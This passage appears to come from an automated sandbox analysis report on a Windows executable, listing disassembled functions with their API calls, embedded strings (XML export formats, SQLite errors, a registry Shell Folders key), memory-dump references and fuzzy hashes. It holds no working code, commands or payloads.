                                                                                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                                                    • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                                                    • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1331804452-0
                                                                                                                                                                                    • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                                                                                                                    • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                                                                                                                    • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                                                    Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                    • String ID: advapi32.dll
                                                                                                                                                                                    • API String ID: 2012295524-4050573280
                                                                                                                                                                                    • Opcode ID: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                                                                                                    • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                                                                                    • Opcode Fuzzy Hash: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                                                                                    Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                                    • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                                    • <%s>, xrefs: 004100A6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$_snwprintf
                                                                                                                                                                                    • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                    • API String ID: 3473751417-2880344631
                                                                                                                                                                                    • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                                                                                                    • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                                                                                                    • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                                                    Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                    • String ID: %2.2X
                                                                                                                                                                                    • API String ID: 2521778956-791839006
                                                                                                                                                                                    • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                                                                                                    • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                                                    • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                                                    Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _snwprintfwcscpy
                                                                                                                                                                                    • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                                    • API String ID: 999028693-502967061
                                                                                                                                                                                    • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                                                                                                    • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                                                    • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                                                    Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • strlen.MSVCRT ref: 00408DFA
                                                                                                                                                                                      • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                                                                                                    • memset.MSVCRT ref: 00408E46
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memsetstrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2350177629-0
                                                                                                                                                                                    • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                                                                                                    • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                                                                                                    Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                    • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                    • API String ID: 2221118986-1606337402
                                                                                                                                                                                    • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                                                                                                                    • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                                                                                                    • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                                                                                                    Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                                                                                                    • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                                                                                                                    • memset.MSVCRT ref: 00408FD4
                                                                                                                                                                                    • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                                                                                                                    • memset.MSVCRT ref: 00409042
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                                                                                                      • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 265355444-0
                                                                                                                                                                                    • Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                                                                                                                    • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                                                                                                    • Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                                                                                                                    • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                                                                                                    Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                      • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                      • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                                                                                    • memset.MSVCRT ref: 0040C439
                                                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                    • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                                                                                    • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4131475296-0
                                                                                                                                                                                    • Opcode ID: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                                                                                                                                                                                    • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                                                    • Opcode Fuzzy Hash: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                                                                                                                                                                                    • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                                                    Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004116FF
                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                      • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                    • API String ID: 2618321458-3614832568
                                                                                                                                                                                    • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                                                                                                    • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                                                                                                    • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                                                                    Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AttributesFilefreememset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2507021081-0
                                                                                                                                                                                    • Opcode ID: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                                                                                                                    • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                                                                    • Opcode Fuzzy Hash: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                                                                    Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                                                    • malloc.MSVCRT ref: 00417524
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                                                    • free.MSVCRT ref: 00417544
                                                                                                                                                                                    • free.MSVCRT ref: 00417562
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4131324427-0
                                                                                                                                                                                    • Opcode ID: 2440c23a1bd9c14e736b75fc15117030069baeee03a9925480b775904b905708
                                                                                                                                                                                    • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2440c23a1bd9c14e736b75fc15117030069baeee03a9925480b775904b905708
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                                                    Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                                                                                    • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                                                                                    • free.MSVCRT ref: 0041822B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PathTemp$free
                                                                                                                                                                                    • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                                    • API String ID: 924794160-1420421710
                                                                                                                                                                                    • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                                                    • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                                                    • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                                                    Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040FDD5
                                                                                                                                                                                      • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                                    • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                    • API String ID: 1775345501-2769808009
                                                                                                                                                                                    • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                                                                                                    • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                                                                                    • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                                                                                    Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0041477F
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0041479A
                                                                                                                                                                                    • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                                                    • String ID: General
                                                                                                                                                                                    • API String ID: 999786162-26480598
                                                                                                                                                                                    • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                                                                                                    • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                                                                                                    • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                                                    Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040977D
